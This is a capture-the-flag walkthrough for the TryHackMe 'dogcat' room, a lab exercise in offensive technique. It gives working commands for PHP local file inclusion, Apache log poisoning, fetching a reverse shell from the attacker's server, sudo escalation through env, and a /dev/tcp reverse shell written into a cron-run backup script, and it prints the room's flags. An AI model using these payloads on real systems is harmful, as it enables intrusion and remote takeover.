Dogcat Walkthrough - THM
Arabic Version: https://root-x.dev/dogcat-walkthrough-thm
Title : dogcat
Link : https://tryhackme.com/room/dogcat
description : I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.
Difficulty: Medium
ip = 10.10.153.226
Attention, if you see the changed ip, you just turn off the device
start nmap scan
output >>> port 22-SSH , 80-http
nmap -sV -oN nmap.out 10.10.243.72
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelWe have a look at the webpage where it lets us view some dog or cat pictures
Having a look at the url, we see that the page is running a php that shows the pictures stored in the dogs or cats folder which passes the value “dog” or “cat” to the variable “view”.
We try some basic LFI here to chech if we can view the /etc/passwd for example with the req url as:
http://10.10.243.72/?view=../../../../../../../../etc/passwd
But it fails showing that only dogs or cats are allowed.
I modify the URL to be :
http://10.10.243.72/?view=dog/../../../../../../../../etc/passwd
The result which I get back shows some very interesting information
So there is an index.php at play in here which has an include() function !
So I try to access it by putting the URL as :
http://10.10.243.72/?view=dog/../index
Now I get following output :
Usually this error usually arises when trying to declare the same function twice, which in this case is probably caused due to the include() function. So to retrieve index.php, I force PHP to base64 encode the file before it is used in the include() function as follows :
look PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#lfi--rfi-using-wrappers
http://10.10.243.72/?view=php://filter/convert.base64-encode/resource=dog/../index
yes this is good
ok, now go to Decoding the string gives us the source code of index.php
echo PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== | base64 -dthis is code
<!DOCTYPE HTML>
<html>
<head>
<title>dogcat</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>dogcat</h1>
<i>a gallery of various dogs or cats</i>
<div>
<h2>What would you like to see?</h2>
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
echo 'Here you go!';
include $_GET['view'] . $ext;
} else {
echo 'Sorry, only dogs or cats are allowed.';
}
}
?>
</div>
</body>
</html>What’s interesting here is that it allows us to pass an “ext” variable that contains the file extension. On the variable being unset, it adds the default extension of .php
So we check now if we can read the /etc/passwd file with the following request
http://10.10.243.72/?view=dog/../../../../etc/passwd&ext=
And we see that we can!
Now we check if we can find the log file where it logs all our requests. After fiddling around for a bit, we find the logs in the /var/log/apache2/access.log finding out that the server is running apache2. And we see our last request there.
http://10.10.243.72/?view=dog/../../../../../var/log/apache2/access.log&ext=
Just as I expected , I get the contents of access.log as follows :
Now I try a bit of command execution. ls -la into view :
However , I get back the same initial page
To inspect further , I check our access.log as previously shown. The last line gives us information about the last command we entered.
Two crucial things I notice here are the facts that whatever command we put in view is being encoded and hence not executed and that our user agent isn’t being done so . So what if I can write some executable PHP code into our user agent…….
I used burp to check the user agent
now i change vaule of user-agent to “Test”
Now Reverse Shell
As we saw previously, we can exploit log poisonining but our objective now is to have a reverse shell. We can do that by injecting PHP code in our user-agent string:
<?php file_put_contents('shell.php', file_get_contents('http://10.8.66.8/shell.php')); ?>Let’s first setup a basic http server that will server our shell.php file
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Don’t forget to modify the script to put your local IP.
Be sure to be in the directory where php-reverse-shell.php is and start a http listener:
sudo python3 -m http.server 4433
Then perform the below request:
curl -A "<?php file_put_contents('php-reverse-shell.php', file_get_contents('http://10.8.66.8:4433/php-reverse-shell.php')); ?>" \
"http://10.10.243.72?view=/dog/../../../../var/log/apache2/access.log&ext"Note <Execute the command twice if it is not done>
and start netcat
nc -nlvp 1234
now access file in your brawser
Now look in Netcat BOOOOOOOOOMMMMMM SHELL
search Falg1
find / -name *flag* 2>/dev/null
listening on [any] 1234 …
connect to [10.8.66.8] from (UNKNOWN) [10.10.243.72] 47544
Linux 052d3a1ad89d 4.15.0–96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 GNU/Linux
11:41:36 up 5 min, 0 users, load average: 1.26, 1.87, 1.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ find / -name *flag* 2>/dev/null
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/var/www/html/flag.php
/var/www/flag2_QMW7JvaY2LvK.txt
/usr/bin/dpkg-buildflags
/usr/local/lib/php/build/ax_check_compile_flag.m4
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/dpkg/buildflags.mk
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/virtual/net/eth0/flags
/sys/module/scsi_mod/parameters/default_dev_flags
$ cat /var/www/html/flag.php
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
?>and the same user Flag 2
$ cat /var/www/flag2_QMW7JvaY2LvK.txt
THM{LF1_t0_RC3_aec3fb}OK now Search Falg 3
But not see in list we need to elevate our privileges. Let’s see our privileges:
$ sudo -l
Matching Defaults entries for www-data on 052d3a1ad89d:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on 052d3a1ad89d:
(root) NOPASSWD: /usr/bin/envok, look this reference
https://gtfobins.github.io/gtfobins/env/
sudo /usr/bin/env /bin/bash
now i am ROOT <Yes this is very nice>
find / -name *flag* 2>/dev/null
.............
..............
..................
cat /root/flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}Flag 4
Are we inside a container?
Still in our reverse shell, running the hostname command outputs 052d3a1ad89d, which might be an indication that we are running inside a container.
Listing the different directories at the root of the system reveals that /opt/ contains backups:
cd /opt
ls
backups
ls -la
total 12
drwxr-xr-x 1 root root 4096 Jul 17 11:38 .
drwxr-xr-x 1 root root 4096 Jul 17 11:37 ..
drwxr-xr-x 2 root root 4096 Apr 8 2020 backups
cd backups
ls -la
total 2892
drwxr-xr-x 2 root root 4096 Apr 8 2020 .
drwxr-xr-x 1 root root 4096 Jul 17 11:38 ..
-rwxr - r - 1 root root 69 Mar 10 2020 backup.sh
-rw-r - r - 1 root root 2949120 Jul 17 12:22 backup.tarShow content in backup.sh
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/containerWhat if I could write my own little piece of code into backup.sh so that it could be automatically executed after a minute and leverage that to break out of our container ?
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.8.66.8/4343 0>&1
Well, let’s write the reverse shell in backup.sh
printf '#!/bin/bash\nbash -i >& /dev/tcp/10.8.66.8/4343 0>&1' > backup.sh
and start netcat tool
nc -lvnp 4343
┌──(elliot㉿kali)-[~]
└─$ nc -nvlp 4343
listening on [any] 4343 …
connect to [10.8.66.8] from (UNKNOWN) [10.10.243.72] 34370
bash: cannot set terminal process group (4685): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# whoami
whoami
root
root@dogcat:~# ls
ls
container
flag4.txt
root@dogcat:~# cat flag4.txt
cat flag4.txt
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
root@dogcat:~#Oh, a lot of writing 😂😭
my Linkedin >> https://www.linkedin.com/in/myelliot/
